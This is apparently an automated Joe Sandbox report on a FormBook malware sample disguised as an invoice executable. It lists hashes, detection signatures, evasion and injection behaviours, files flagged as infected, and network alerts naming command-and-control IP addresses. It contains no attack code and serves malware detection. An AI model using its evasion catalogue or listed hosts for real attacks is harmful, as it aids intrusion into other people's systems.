Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
invoice_96.73.exe

Overview

General Information

Sample name:invoice_96.73.exe
Analysis ID:1564502
MD5:0ad46265c37a53172d0658e862699a0e
SHA1:82a738aeecee1392fcbb46a6ebceb367790e4831
SHA256:04bd713b045d145c032e88c3f122e92565b3647e016367e29987c9afc2666d04
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries random domain names (often used to prevent blacklisting and sinkholes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Connects to many different domains
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w7x64
  • invoice_96.73.exe (PID: 3268 cmdline: "C:\Users\user\Desktop\invoice_96.73.exe" MD5: 0AD46265C37A53172D0658E862699A0E)
    • svchost.exe (PID: 3380 cmdline: "C:\Users\user\Desktop\invoice_96.73.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
  • armsvc.exe (PID: 3320 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 38BDB885A492FB07195A5DF3F45BA0BB)
  • alg.exe (PID: 3456 cmdline: C:\Windows\System32\alg.exe MD5: D51E3C5F1FB63103D04A4FDBBC56FEE7)
  • aspnet_state.exe (PID: 3492 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe MD5: BBA4722DF24C70555CF255FAE1A123D7)
  • ehrecvr.exe (PID: 3792 cmdline: C:\Windows\ehome\ehRecvr.exe MD5: 22DA4B53195377BBE2A2460989C3D203)
  • ehsched.exe (PID: 3860 cmdline: C:\Windows\ehome\ehsched.exe MD5: C0B1AC1980E0EE5E641EA4C250791D87)
  • FXSSVC.exe (PID: 3936 cmdline: C:\Windows\system32\fxssvc.exe MD5: 862331ACCCC3F8DC8BF248C0E6CF16A3)
  • ieetwcollector.exe (PID: 4024 cmdline: C:\Windows\system32\IEEtwCollector.exe /V MD5: 475B5B41F2CFABE32500D1A9602C2A3E)
  • maintenanceservice.exe (PID: 4068 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: CC9BE47A84D7EB73D78181F087D654DC)
  • msdtc.exe (PID: 2992 cmdline: C:\Windows\System32\msdtc.exe MD5: 8A39539F9626492BC25BBEF9E516EC26)
  • msiexec.exe (PID: 2952 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 2568F4F643C82673898904F584A264BA)
  • perfhost.exe (PID: 2260 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 4A3EAAF9D1C0E0BB3F263E7A314171FA)
  • Locator.exe (PID: 1976 cmdline: C:\Windows\system32\locator.exe MD5: 16E5AF7C321FDD4D4ABCA40501F44C18)
  • snmptrap.exe (PID: 2092 cmdline: C:\Windows\System32\snmptrap.exe MD5: 2A428B8B0253AA1D839ED564BA512230)
  • vds.exe (PID: 2748 cmdline: C:\Windows\System32\vds.exe MD5: CC2DA4A13C382DA8674052AB5005C252)
  • wbengine.exe (PID: 2728 cmdline: "C:\Windows\system32\wbengine.exe" MD5: B9B616B65A90E396A161A24A8A456884)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Uncommon Svchost Parent Process
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\invoice_96.73.exe", CommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", ParentImage: C:\Users\user\Desktop\invoice_96.73.exe, ParentProcessId: 3268, ParentProcessName: invoice_96.73.exe, ProcessCommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", ProcessId: 3380, ProcessName: svchost.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\invoice_96.73.exe", CommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", ParentImage: C:\Users\user\Desktop\invoice_96.73.exe, ParentProcessId: 3268, ParentProcessName: invoice_96.73.exe, ProcessCommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", ProcessId: 3380, ProcessName: svchost.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-28T12:12:04.812989+010020516491A Network Trojan was detected192.168.2.22527818.8.8.853UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-28T12:11:59.186207+010020516481A Network Trojan was detected192.168.2.22498818.8.8.853UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-28T12:11:59.256622+010020181411A Network Trojan was detected44.221.84.10580192.168.2.2249168TCP
      2024-11-28T12:13:38.712649+010020181411A Network Trojan was detected47.129.31.21280192.168.2.2249176TCP
      2024-11-28T12:13:40.919269+010020181411A Network Trojan was detected13.251.16.15080192.168.2.2249177TCP
      2024-11-28T12:13:45.265069+010020181411A Network Trojan was detected18.141.10.10780192.168.2.2249179TCP
      2024-11-28T12:13:49.618320+010020181411A Network Trojan was detected34.246.200.16080192.168.2.2249182TCP
      2024-11-28T12:13:51.584461+010020181411A Network Trojan was detected18.208.156.24880192.168.2.2249183TCP
      2024-11-28T12:14:05.039850+010020181411A Network Trojan was detected54.244.188.17780192.168.2.2249187TCP
      2024-11-28T12:14:06.755681+010020181411A Network Trojan was detected35.164.78.20080192.168.2.2249188TCP
      2024-11-28T12:14:08.144025+010020181411A Network Trojan was detected3.94.10.3480192.168.2.2249189TCP
      2024-11-28T12:14:14.311753+010020181411A Network Trojan was detected18.246.231.12080192.168.2.2249196TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-28T12:11:59.256622+010020377711A Network Trojan was detected44.221.84.10580192.168.2.2249168TCP
      2024-11-28T12:13:38.712649+010020377711A Network Trojan was detected47.129.31.21280192.168.2.2249176TCP
      2024-11-28T12:13:40.919269+010020377711A Network Trojan was detected13.251.16.15080192.168.2.2249177TCP
      2024-11-28T12:13:45.265069+010020377711A Network Trojan was detected18.141.10.10780192.168.2.2249179TCP
      2024-11-28T12:13:49.618320+010020377711A Network Trojan was detected34.246.200.16080192.168.2.2249182TCP
      2024-11-28T12:13:51.584461+010020377711A Network Trojan was detected18.208.156.24880192.168.2.2249183TCP
      2024-11-28T12:14:05.039850+010020377711A Network Trojan was detected54.244.188.17780192.168.2.2249187TCP
      2024-11-28T12:14:06.755681+010020377711A Network Trojan was detected35.164.78.20080192.168.2.2249188TCP
      2024-11-28T12:14:08.144025+010020377711A Network Trojan was detected3.94.10.3480192.168.2.2249189TCP
      2024-11-28T12:14:14.311753+010020377711A Network Trojan was detected18.246.231.12080192.168.2.2249196TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-28T12:13:38.589710+010028508511Malware Command and Control Activity Detected192.168.2.224917647.129.31.21280TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: invoice_96.73.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXEAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeAvira: detection malicious, Label: W32/Infector.Gen
      Multi AV Scanner detection for submitted file
      Source: invoice_96.73.exeReversingLabs: Detection: 95%
      Yara detected FormBook
      Source: Yara matchFile source: 00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for dropped file
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJoe Sandbox ML: detected
      Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXEJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJoe Sandbox ML: detected
      Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJoe Sandbox ML: detected
      Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJoe Sandbox ML: detected
      Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: invoice_96.73.exeJoe Sandbox ML: detected
      Source: invoice_96.73.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      Source: C:\Windows\System32\msdtc.exeFile created: C:\Windows\DtcInstall.logJump to behavior
      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.549948881.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: invoice_96.73.exe, 00000000.00000003.346461774.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
      Source: Binary string: TextExtractor.pdb55. source: armsvc.exe, 00000002.00000003.528202244.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msiexec.pdb source: armsvc.exe, 00000002.00000003.384565633.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.384370417.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\ktab_objs\ktab.pdb source: armsvc.exe, 00000002.00000003.469269296.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.470738958.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, ktab.exe.2.dr
      Source: Binary string: AcroBroker.pdb source: armsvc.exe, 00000002.00000003.494060398.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\klist_objs\klist.pdb source: armsvc.exe, 00000002.00000003.466271925.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.468672844.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vssvc.pdb source: armsvc.exe, 00000002.00000003.400446853.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.397705170.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.535376805.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: sppsvc.pdb source: armsvc.exe, 00000002.00000003.393285094.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\jp2launcher\obj64\jp2launcher.pdb source: armsvc.exe, 00000002.00000003.459702439.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000002.00000003.377542137.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WCChromeNativeMessagingHost.pdb88/ source: armsvc.exe, 00000002.00000003.543127259.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msiexec.pdbE3 source: armsvc.exe, 00000002.00000003.384565633.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.384370417.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: aspnet_state.pdb source: invoice_96.73.exe, 00000000.00000003.353700920.00000000037C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdbTb source: armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb source: armsvc.exe, 00000002.00000003.453426244.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: invoice_96.73.exe, 00000000.00000003.350225262.0000000004220000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.353569093.0000000004380000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.382195696.0000000000710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.387726638.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.387726638.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.381468216.0000000000450000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\jre-image\bin\javaws.pdb source: armsvc.exe, 00000002.00000003.456767187.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\servertool_objs\servertool.pdb source: armsvc.exe, 00000002.00000003.484334362.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.485863141.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, servertool.exe.2.dr
      Source: Binary string: FXSSVC.pdb source: armsvc.exe, 00000002.00000003.375221834.0000000002110000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.375401545.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Perforce\FRMain\code\build\win\results\Release\info\arh.pdb source: armsvc.exe, 00000002.00000003.539704237.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: snmptrap.pdb@SH source: armsvc.exe, 00000002.00000003.391469846.0000000002030000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391488401.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392623971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391662820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391640685.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392746098.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391569645.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391549027.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391679575.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.410168312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ehSched.pdb source: armsvc.exe, 00000002.00000003.368828729.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: mscorsvw.pdbD source: armsvc.exe, 00000002.00000003.356595540.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356855501.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: locator.pdb@SH source: armsvc.exe, 00000002.00000003.390348820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391373712.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390223997.0000000002040000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.2.dr
      Source: Binary string: locator.pdb source: armsvc.exe, 00000002.00000003.390348820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391373712.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390223997.0000000002040000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.2.dr
      Source: Binary string: Eula.pdb995 source: armsvc.exe, 00000002.00000003.546479748.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msdtcexe.pdbE3 source: armsvc.exe, 00000002.00000003.383128547.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.383373251.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroRd32Info.pdb''$ source: armsvc.exe, 00000002.00000003.525307374.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ALG.pdbH source: invoice_96.73.exe, 00000000.00000003.353143094.0000000002990000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349561520.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349725788.0000000003690000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jjs_objs\jjs.pdb source: armsvc.exe, 00000002.00000003.457782973.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.459238005.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\javaw_objs\javaw.pdb source: armsvc.exe, 00000002.00000003.455163285.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vds.pdb source: armsvc.exe, 00000002.00000003.397013643.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.396407942.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\pack200_objs\pack200.pdb source: armsvc.exe, 00000002.00000003.475333705.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.473148665.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, pack200.exe.2.dr
      Source: Binary string: FXSSVC.pdbH source: armsvc.exe, 00000002.00000003.375221834.0000000002110000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.375401545.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ADelRCP_Exec.pdb"" source: armsvc.exe, 00000002.00000003.535376805.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wbengine.pdb source: armsvc.exe, 00000002.00000003.406707369.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.408514012.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.2.dr
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\ssvagent\obj64\ssvagent.pdb source: armsvc.exe, 00000002.00000003.486325519.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: RdrServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.505647536.0000000001520000.00000004.00001000.00020000.00000000.sdmp, RdrServicesUpdater.exe.2.dr
      Source: Binary string: Reader_SL.pdb source: armsvc.exe, 00000002.00000003.562770680.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, reader_sl.exe.2.dr
      Source: Binary string: dllhost.pdb source: armsvc.exe, 00000002.00000003.367049067.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.365429187.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.366371363.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.560950448.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
